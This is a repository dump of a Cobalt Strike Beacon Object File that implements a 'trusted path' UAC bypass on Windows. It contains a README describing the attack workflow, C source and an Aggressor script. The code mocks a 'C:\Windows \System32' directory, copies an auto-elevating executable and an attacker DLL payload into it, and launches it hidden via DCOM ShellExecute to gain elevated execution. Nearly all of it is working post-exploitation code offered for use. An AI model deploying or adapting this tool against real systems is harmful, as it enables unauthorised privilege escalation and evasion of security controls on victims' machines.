├── Makefile ├── README.md ├── beacon.h ├── execution.png ├── trustedpath-uacbypass.c ├── trustedpath-uacbypass.cna └── trustedpath-uacbypass.x64.o /Makefile: -------------------------------------------------------------------------------- 1 | BOF_Function := trustedpath-uacbypass 2 | CC_x64 := x86_64-w64-mingw32-gcc 3 | all: 4 | $(CC_x64) -o $(BOF_Function).x64.o -c $(BOF_Function).c 5 | 6 | clean: 7 | rm $(BOF_Function).o 8 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # BOF - Trusted Path UAC Bypass 2 | Beacon object file implementation for trusted path UAC bypass. The target executable will be called without involving "cmd.exe" by using DCOM object. 3 | 4 | Technical details: 5 | 6 | https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows 7 | 8 | **Usage** 9 | 10 | `Example: bof-trustedpath-uacbypass ComputerDefaults.exe /root/edputil.dll` 11 | 12 | **Compile** 13 | 14 | `make` 15 | 16 | **Execution** 17 | ``` 18 | beacon> help bof-trustedpath-uacbypass 19 | Version: 1.0 20 | Author: Chris Au 21 | Twitter: @netero_1010 22 | Github: @netero1010 23 | 24 | ====================Trusted Path UAC Bypass BOF Workflow======================= 25 | Step 1: Upload the DLL payload to "C:\Windows\Tasks" 26 | Step 2: Create a new folder called "C:\Windows \System32" 27 | Step 3: Copy desired executable to "C:\Windows \System32" 28 | Step 4: Copy the DLL payload to "C:\Windows \System32" 29 | Step 5: Use DCOM to execute "C:\Windows \System32\" 30 | Step 6: Delete the DLL payload on "C:\Windows\Tasks" 31 | ================================================================================ 32 | 33 | Example: bof-trustedpath-uacbypass ComputerDefaults.exe /root/edputil.dll 34 | ``` 35 | 36 | ![HowTo](https://github.com/netero1010/TrustedPath-UACBypass-BOF/raw/main/execution.png) 37 | 38 | **Credit** 39 | @David Wells and @Wietze for excellent research 40 | https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e 41 | https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows 42 | 43 | @Yas_o_h for the awesome DCOM BOF implementation 44 | https://github.com/Yaxser/CobaltStrike-BOF/tree/master/DCOM%20Lateral%20Movement 45 | -------------------------------------------------------------------------------- /beacon.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Beacon Object Files (BOF) 3 | * ------------------------- 4 | * A Beacon Object File is a light-weight post exploitation tool that runs 5 | * with Beacon's inline-execute command. 6 | * 7 | * Cobalt Strike 4.1. 8 | */ 9 | 10 | /* data API */ 11 | typedef struct { 12 | char * original; /* the original buffer [so we can free it] */ 13 | char * buffer; /* current pointer into our buffer */ 14 | int length; /* remaining length of data */ 15 | int size; /* total size of this buffer */ 16 | } datap; 17 | 18 | DECLSPEC_IMPORT void BeaconDataParse(datap * parser, char * buffer, int size); 19 | DECLSPEC_IMPORT int BeaconDataInt(datap * parser); 20 | DECLSPEC_IMPORT short BeaconDataShort(datap * parser); 21 | DECLSPEC_IMPORT int BeaconDataLength(datap * parser); 22 | DECLSPEC_IMPORT char * BeaconDataExtract(datap * parser, int * size); 23 | 24 | /* format API */ 25 | typedef struct { 26 | char * original; /* the original buffer [so we can free it] */ 27 | char * buffer; /* current pointer into our buffer */ 28 | int length; /* remaining length of data */ 29 | int size; /* total size of this buffer */ 30 | } formatp; 31 | 32 | DECLSPEC_IMPORT void BeaconFormatAlloc(formatp * format, int maxsz); 33 | DECLSPEC_IMPORT void BeaconFormatReset(formatp * format); 34 | DECLSPEC_IMPORT void BeaconFormatFree(formatp * format); 35 | DECLSPEC_IMPORT void BeaconFormatAppend(formatp * format, char * text, int len); 36 | DECLSPEC_IMPORT void BeaconFormatPrintf(formatp * format, char * fmt, ...); 37 | DECLSPEC_IMPORT char * BeaconFormatToString(formatp * format, int * size); 38 | DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value); 39 | 40 | /* Output Functions */ 41 | #define CALLBACK_OUTPUT 0x0 42 | #define CALLBACK_OUTPUT_OEM 0x1e 43 | #define CALLBACK_ERROR 0x0d 44 | #define CALLBACK_OUTPUT_UTF8 0x20 45 | 46 | DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...); 47 | DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len); 48 | 49 | /* Token Functions */ 50 | DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); 51 | DECLSPEC_IMPORT void BeaconRevertToken(); 52 | DECLSPEC_IMPORT BOOL BeaconIsAdmin(); 53 | 54 | /* Spawn+Inject Functions */ 55 | DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char * buffer, int length); 56 | DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len); 57 | DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len); 58 | DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo); 59 | 60 | /* Utility Functions */ 61 | DECLSPEC_IMPORT BOOL toWideChar(char * src, wchar_t * dst, int max); 62 | -------------------------------------------------------------------------------- /execution.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/netero1010/TrustedPath-UACBypass-BOF/b7ffbd5678cec2fb3031e0bb31dce42448a7c29a/execution.png -------------------------------------------------------------------------------- /trustedpath-uacbypass.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include "beacon.h" 9 | 10 | DECLSPEC_IMPORT WINBASEAPI BOOL WINAPI KERNEL32$CreateDirectoryW(LPCTSTR, LPSECURITY_ATTRIBUTES); 11 | DECLSPEC_IMPORT WINBASEAPI BOOL WINAPI KERNEL32$CopyFileW(LPCTSTR, LPCTSTR, BOOL); 12 | DECLSPEC_IMPORT WINBASEAPI BOOL WINAPI KERNEL32$DeleteFileW(LPCTSTR); 13 | DECLSPEC_IMPORT WINBASEAPI BOOL WINAPI SHLWAPI$PathFileExistsW(LPCTSTR); 14 | WINBASEAPI wchar_t WINAPI MSVCRT$wcscat(wchar_t * destination, const wchar_t * source); 15 | DECLSPEC_IMPORT WINBASEAPI DWORD WINAPI KERNEL32$GetLastError(void); 16 | DECLSPEC_IMPORT WINOLEAPI OLE32$CoInitialize(LPVOID pvReserved); 17 | DECLSPEC_IMPORT WINOLEAPI OLE32$CLSIDFromString(LPCOLESTR lpsz, LPCLSID pclsid); 18 | DECLSPEC_IMPORT WINOLEAPI OLE32$CoCreateInstanceEx(REFCLSID, IUnknown*,DWORD,COSERVERINFO*, DWORD,MULTI_QI*); 19 | DECLSPEC_IMPORT WINBASEAPI void * WINAPI KERNEL32$HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes); 20 | DECLSPEC_IMPORT WINBASEAPI HANDLE WINAPI KERNEL32$GetProcessHeap(); 21 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$IIDFromString(wchar_t * lpsz, LPIID lpiid); 22 | DECLSPEC_IMPORT WINOLEAPI_(void) OLE32$CoUninitialize(void); 23 | DECLSPEC_IMPORT WINOLEAUTAPI_(BSTR) OleAut32$SysAllocString(const OLECHAR *); 24 | 25 | void go(char * args, int alen) 26 | { 27 | // Initialize variables 28 | wchar_t originalLocation[100] = {0}; 29 | wchar_t newLocation[100] = {0}; 30 | wchar_t originalDLLLocation[100] = {0}; 31 | wchar_t newDLLLocation[100] = {0}; 32 | datap parser; 33 | DWORD errorcode; 34 | BeaconDataParse(&parser, args, alen); 35 | wchar_t* targetProc = (wchar_t*)BeaconDataExtract(&parser, NULL); 36 | wchar_t* DLL = (wchar_t*)BeaconDataExtract(&parser, NULL);; 37 | MSVCRT$wcscat(originalLocation, L"C:\\Windows\\System32\\"); 38 | MSVCRT$wcscat(originalLocation, targetProc); 39 | MSVCRT$wcscat(newLocation, L"C:\\Windows \\System32\\"); 40 | MSVCRT$wcscat(originalDLLLocation, L"C:\\Windows\\Tasks\\"); 41 | MSVCRT$wcscat(originalDLLLocation, DLL); 42 | MSVCRT$wcscat(newDLLLocation, L"C:\\Windows \\System32\\"); 43 | MSVCRT$wcscat(newDLLLocation, DLL); 44 | MSVCRT$wcscat(newLocation, targetProc); 45 | 46 | // Check if file exists 47 | if(!SHLWAPI$PathFileExistsW((LPCTSTR)originalLocation)){ 48 | BeaconPrintf(CALLBACK_ERROR, "The target executable does not exist in \"C:\\Windows\\System32\"."); 49 | goto FileCleanup; 50 | return; 51 | } 52 | 53 | // Create "C:\Windows \System32" directory 54 | KERNEL32$CreateDirectoryW((LPCTSTR)L"\\\\?\\C:\\Windows \\", 0); 55 | KERNEL32$CreateDirectoryW((LPCTSTR)L"\\\\?\\C:\\Windows \\System32\\", 0); 56 | 57 | // Copy the DLL payload and target executable to "C:\Windows \System32" 58 | BeaconPrintf(CALLBACK_OUTPUT, "Copying file from \"%ls\" to \"%ls\".", originalLocation, newLocation); 59 | KERNEL32$CopyFileW((LPCTSTR)originalLocation, (LPCTSTR)newLocation, FALSE); 60 | errorcode = KERNEL32$GetLastError(); 61 | if(errorcode!=0){ 62 | if(errorcode==32){ 63 | BeaconPrintf(CALLBACK_ERROR, "Error %d: Could not copy the executable to the destination because it is running by another program. Please kill the process and retry.", KERNEL32$GetLastError()); 64 | }else{ 65 | BeaconPrintf(CALLBACK_ERROR, "Error %d: Could not copy the executable to the destination.", KERNEL32$GetLastError()); 66 | } 67 | goto FileCleanup; 68 | return; 69 | }else{ 70 | BeaconPrintf(CALLBACK_OUTPUT, "Executable copied successfully."); 71 | } 72 | KERNEL32$CopyFileW((LPCTSTR)originalDLLLocation, (LPCTSTR)newDLLLocation, FALSE); 73 | if(KERNEL32$GetLastError()!=0){ 74 | BeaconPrintf(CALLBACK_ERROR, "Error %d: Could not copy the DLL payload to the destination.", KERNEL32$GetLastError()); 75 | goto FileCleanup; 76 | return; 77 | }else{ 78 | BeaconPrintf(CALLBACK_OUTPUT, "DLL payload copied successfully."); 79 | } 80 | 81 | // The full DCOM execution all credit to @Yas_o_h for his DCOM BOF implementation (https://raw.githubusercontent.com/Yaxser/CobaltStrike-BOF/6fe9cc139632c8301c207ea27e4859d7224418b9/DCOM%20Lateral%20Movement/BOF-IShellWindows-DCOM.c) 82 | HRESULT hr = S_OK; 83 | IID Ipsb, Ipsv, Ipsw, Ipsfvd, Ipdisp, IpdispBackground, ISHLDISP, IshellWindowCLSID, ITopLevelSID, servicerprovider_iid; 84 | HWND hwnd; 85 | IShellBrowser* psb; 86 | IShellView* psv; 87 | IShellWindows* psw; 88 | IShellFolderViewDual* psfvd; 89 | IShellDispatch2* psd; 90 | IDispatch* pdisp, * pdispBackground; 91 | IServiceProvider* svsProvider; 92 | VARIANT vEmpty = { vEmpty.vt = VT_I4, vEmpty.lVal = 0 }; 93 | 94 | hr = OLE32$CoInitialize(NULL); 95 | if (!SUCCEEDED(hr)) { 96 | BeaconPrintf(CALLBACK_ERROR, "CoInitialize failed: 0x%08lx", hr); 97 | goto FileCleanup; 98 | return; 99 | } 100 | 101 | wchar_t* ShellBrowserI = L"{000214E2-0000-0000-C000-000000000046}"; 102 | wchar_t* ShellViewI = L"{000214E3-0000-0000-C000-000000000046}"; 103 | wchar_t* ShellWindowsI = L"{85CB6900-4D95-11CF-960C-0080C7F4EE85}"; 104 | wchar_t* ShellFolderViewDualI = L"{E7A1AF80-4D96-11CF-960C-0080C7F4EE85}"; 105 | wchar_t* Dispatch_I = L"{00020400-0000-0000-C000-000000000046}"; 106 | wchar_t* ShellDispatch_I = L"{A4C6892C-3BA9-11D2-9DEA-00C04FB16162}"; 107 | wchar_t* ShellWindowCLSID = L"{9BA05972-F6A8-11CF-A442-00A0C90A8F39}"; 108 | wchar_t* TopLevelBrowserSID = L"{4C96BE40-915C-11CF-99D3-00AA004AE837}"; 109 | wchar_t* ServiceProviderI = L"{6D5140C1-7436-11CE-8034-00AA006009FA}"; 110 | 111 | OLE32$IIDFromString(ShellBrowserI, &Ipsb); 112 | OLE32$IIDFromString(ShellViewI, &Ipsv); 113 | OLE32$IIDFromString(ShellWindowsI, &Ipsw); 114 | OLE32$IIDFromString(ShellFolderViewDualI, &Ipsfvd); 115 | OLE32$IIDFromString(ShellFolderViewDualI, &IpdispBackground); 116 | OLE32$IIDFromString(Dispatch_I, &Ipdisp); 117 | OLE32$IIDFromString(ShellDispatch_I, &ISHLDISP); 118 | OLE32$CLSIDFromString(ShellWindowCLSID, &IshellWindowCLSID); 119 | OLE32$CLSIDFromString(TopLevelBrowserSID, &ITopLevelSID); 120 | OLE32$IIDFromString(ServiceProviderI, &servicerprovider_iid); 121 | 122 | const GUID GUID_NULL = { 0, 0, 0, { 0, 0, 0, 0, 0, 0, 0, 0 } }; 123 | 124 | COSERVERINFO* srvinfo = KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(COSERVERINFO)); 125 | COAUTHINFO* authInfo = KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(COAUTHINFO)); 126 | COAUTHIDENTITY* authidentity = NULL; 127 | MULTI_QI mqi[1] = { &Ipsw, NULL, hr }; 128 | 129 | authInfo->dwAuthnSvc = RPC_C_AUTHN_WINNT; 130 | authInfo->dwAuthzSvc = RPC_C_AUTHZ_NONE; 131 | authInfo->pwszServerPrincName = NULL; 132 | authInfo->dwAuthnLevel = RPC_C_AUTHN_LEVEL_DEFAULT; 133 | authInfo->dwImpersonationLevel = RPC_C_IMP_LEVEL_IMPERSONATE; 134 | authInfo->dwCapabilities = EOAC_NONE; 135 | srvinfo->dwReserved1 = 0; 136 | srvinfo->dwReserved2 = 0; 137 | srvinfo->pAuthInfo = authInfo; 138 | 139 | hr = OLE32$CoCreateInstanceEx(&IshellWindowCLSID, NULL, CLSCTX_LOCAL_SERVER, srvinfo, 1, mqi); 140 | 141 | if(!SUCCEEDED(hr)){ 142 | BeaconPrintf(CALLBACK_ERROR, "CoCreateInstanceEx failed: 0x%08lx", hr); 143 | goto FileCleanup; 144 | return; 145 | } 146 | 147 | hr = mqi->pItf->lpVtbl->QueryInterface(mqi->pItf, &Ipsw, (void**)&psw); 148 | 149 | if(!SUCCEEDED(hr)){ 150 | BeaconPrintf(CALLBACK_ERROR, "ShellWindows->QueryInterface failed: 0x%08lx", hr); 151 | goto Cleanup; 152 | goto FileCleanup; 153 | return; 154 | } 155 | 156 | hr = mqi->pItf->lpVtbl->Release(mqi->pItf); 157 | 158 | if(!SUCCEEDED(hr)){ 159 | BeaconPrintf(CALLBACK_ERROR, "Releaseing IShellWindows failed: 0x%08lx", hr); 160 | goto Cleanup; 161 | goto FileCleanup; 162 | return; 163 | } 164 | 165 | hr = psw->lpVtbl->FindWindowSW(psw, &vEmpty, &vEmpty, SWC_DESKTOP, (long*)&hwnd, SWFO_NEEDDISPATCH, &pdisp); 166 | 167 | if(!SUCCEEDED(hr)){ 168 | BeaconPrintf(CALLBACK_ERROR, "FindWindowSW failed: 0x%08lx", hr); 169 | goto Cleanup; 170 | goto FileCleanup; 171 | return; 172 | } 173 | 174 | hr = pdisp->lpVtbl->QueryInterface(pdisp, &servicerprovider_iid, (void**)&svsProvider); 175 | if(!SUCCEEDED(hr)){ 176 | BeaconPrintf(CALLBACK_ERROR, "pdisp->QueryInterface failed: 0x%08lx", hr); 177 | goto Cleanup; 178 | goto FileCleanup; 179 | return; 180 | } 181 | 182 | hr = svsProvider->lpVtbl->QueryService(svsProvider, &ITopLevelSID, &Ipsb, (void**)&psb); 183 | if(!SUCCEEDED(hr)){ 184 | BeaconPrintf(CALLBACK_ERROR, "pdisp->QueryInterface failed: 0x%08lx", hr); 185 | goto Cleanup; 186 | goto FileCleanup; 187 | return; 188 | } 189 | 190 | hr = psb->lpVtbl->QueryActiveShellView(psb, &psv); 191 | if(!SUCCEEDED(hr)){ 192 | BeaconPrintf(CALLBACK_ERROR, "psb->QueryActiveShellView failed: 0x%08lx", hr); 193 | goto Cleanup; 194 | goto FileCleanup; 195 | return; 196 | } 197 | 198 | hr = psv->lpVtbl->GetItemObject(psv, SVGIO_BACKGROUND, &Ipdisp, (void**)&pdispBackground); 199 | if(!SUCCEEDED(hr)){ 200 | BeaconPrintf(CALLBACK_ERROR, "psv->GetItemObject failed: 0x%08lx", hr); 201 | goto Cleanup; 202 | goto FileCleanup; 203 | return; 204 | } 205 | 206 | hr = pdispBackground->lpVtbl->QueryInterface(pdispBackground, &Ipsfvd, (void**)&psfvd); 207 | if(!SUCCEEDED(hr)){ 208 | BeaconPrintf(CALLBACK_ERROR, "pdispBackground->QueryInterface failed: 0x%08lx", hr); 209 | goto Cleanup; 210 | goto FileCleanup; 211 | return; 212 | } 213 | 214 | hr = psfvd->lpVtbl->get_Application(psfvd, &pdisp); 215 | if(!SUCCEEDED(hr)){ 216 | BeaconPrintf(CALLBACK_ERROR, "psfvd->get_Application failed: 0x%08lx", hr); 217 | goto Cleanup; 218 | goto FileCleanup; 219 | return; 220 | } 221 | 222 | hr = pdisp->lpVtbl->QueryInterface(pdisp, &ISHLDISP, (void**)&psd); 223 | if(!SUCCEEDED(hr)){ 224 | BeaconPrintf(CALLBACK_ERROR, "pdisp->QueryInterface failed: 0x%08lx", hr); 225 | goto Cleanup; 226 | goto FileCleanup; 227 | return; 228 | } 229 | 230 | BeaconPrintf(CALLBACK_OUTPUT, "Executing \"%ls\"...", newLocation); 231 | BSTR bstrFile = OleAut32$SysAllocString(newLocation); 232 | 233 | VARIANT vOperation; 234 | vOperation.vt = VT_BSTR; 235 | vOperation.bstrVal = OleAut32$SysAllocString(L"open"); 236 | 237 | VARIANT vShow; 238 | vShow.vt = VT_INT; 239 | vShow.intVal = SW_HIDE; 240 | 241 | VARIANT vArgs; 242 | vArgs.vt = VT_BSTR; 243 | vArgs.bstrVal = OleAut32$SysAllocString(L""); 244 | 245 | VARIANT vDir; 246 | vDir.vt = VT_BSTR; 247 | vDir.bstrVal = OleAut32$SysAllocString(L""); 248 | 249 | psd->lpVtbl->ShellExecute(psd, bstrFile, vArgs, vDir, vOperation, vShow); 250 | if(!SUCCEEDED(hr)){ 251 | BeaconPrintf(CALLBACK_ERROR, "psd->ShellExecute failed: 0x%08lx", hr); 252 | } 253 | 254 | goto Cleanup; 255 | goto FileCleanup; 256 | 257 | Cleanup: 258 | if(mqi->pItf != NULL){ 259 | mqi->pItf->lpVtbl->Release(mqi->pItf); 260 | } 261 | if(psb != NULL){ 262 | psb->lpVtbl->Release(psb); 263 | } 264 | if(psv != NULL){ 265 | psv->lpVtbl->Release(psv); 266 | } 267 | if(psw != NULL){ 268 | psw->lpVtbl->Release(psw); 269 | } 270 | if(psfvd != NULL){ 271 | psfvd->lpVtbl->Release(psfvd); 272 | } 273 | if(pdisp != NULL){ 274 | pdisp->lpVtbl->Release(pdisp); 275 | } 276 | if(pdispBackground != NULL){ 277 | pdispBackground->lpVtbl->Release(pdispBackground); 278 | } 279 | if(svsProvider != NULL){ 280 | svsProvider->lpVtbl->Release(svsProvider); 281 | } 282 | if(psd != NULL){ 283 | psd->lpVtbl->Release(psd); 284 | } 285 | OLE32$CoUninitialize(); 286 | 287 | FileCleanup: 288 | BeaconPrintf(CALLBACK_OUTPUT, "Cleaning up..."); 289 | KERNEL32$DeleteFileW((LPCTSTR)originalDLLLocation); 290 | BeaconPrintf(CALLBACK_OUTPUT, "DLL payload in the \"C:\\Windows\\Tasks\" deleted successfully."); 291 | }; 292 | -------------------------------------------------------------------------------- /trustedpath-uacbypass.cna: -------------------------------------------------------------------------------- 1 | # Credit to @Yas_o_h for his awesome DCOM BOF implementation 2 | 3 | beacon_command_register("bof-trustedpath-uacbypass", "BOF implementation for trusted path UAC bypass", 4 | " 5 | Version: 1.0 6 | Author: Chris Au 7 | Twitter: @netero_1010 8 | Github: @netero1010 9 | 10 | ====================Trusted Path UAC Bypass BOF Workflow======================= 11 | Step 1: Upload the DLL payload to \"C:\\Windows\\Tasks\" 12 | Step 2: Create a new folder called \"C:\\Windows \\System32\" 13 | Step 3: Copy desired executable to \"C:\\Windows \\System32\" 14 | Step 4: Copy the DLL payload to \"C:\\Windows \\System32\" 15 | Step 5: Use DCOM to execute \"C:\\Windows \\System32\\\" 16 | Step 6: Delete the DLL payload on \"C:\\Windows\\Tasks\" 17 | ================================================================================ 18 | 19 | Example: bof-trustedpath-uacbypass ComputerDefaults.exe /root/edputil.dll"); 20 | 21 | alias bof-trustedpath-uacbypass { 22 | local('$args'); 23 | $barch = barch($1); 24 | if(size(@_) < 3){ 25 | berror($1, "Missing arugment. Example: bof-trustedpath-uacbypass ComputerDefaults.exe /root/edputil.dll"); 26 | return; 27 | } 28 | $targetProc = split("\\\\", $2)[-1]; 29 | $DLL = $3; 30 | $DLLFileName = split("\\\\", $DLL)[-1]; 31 | $DLLFileName = split("/", $DLLFileName)[-1]; 32 | $DLLhandle = openf($DLL); 33 | $DLLdata = readb($DLLhandle, -1); 34 | if(strlen($DLLdata) == 0){ 35 | berror($1, "File is empty or not exit. Please use a valid file."); 36 | return; 37 | } 38 | bupload_raw!($1, "C:\\Windows\\Tasks\\" . $DLLFileName, $DLLdata); 39 | closef($DLLhandle); 40 | blog($1, "Dropped DLL payload to \"C:\\Windows\\Tasks\" folder."); 41 | $args = bof_pack($1, "ZZ", $targetProc, $DLLFileName); 42 | $handle = openf(script_resource("trustedpath-uacbypass. $+ $barch $+ .o")); 43 | $data = readb($handle, -1); 44 | closef($handle); 45 | beacon_inline_execute($1, $data, "go", $args); 46 | } 47 | -------------------------------------------------------------------------------- /trustedpath-uacbypass.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/netero1010/TrustedPath-UACBypass-BOF/b7ffbd5678cec2fb3031e0bb31dce42448a7c29a/trustedpath-uacbypass.x64.o --------------------------------------------------------------------------------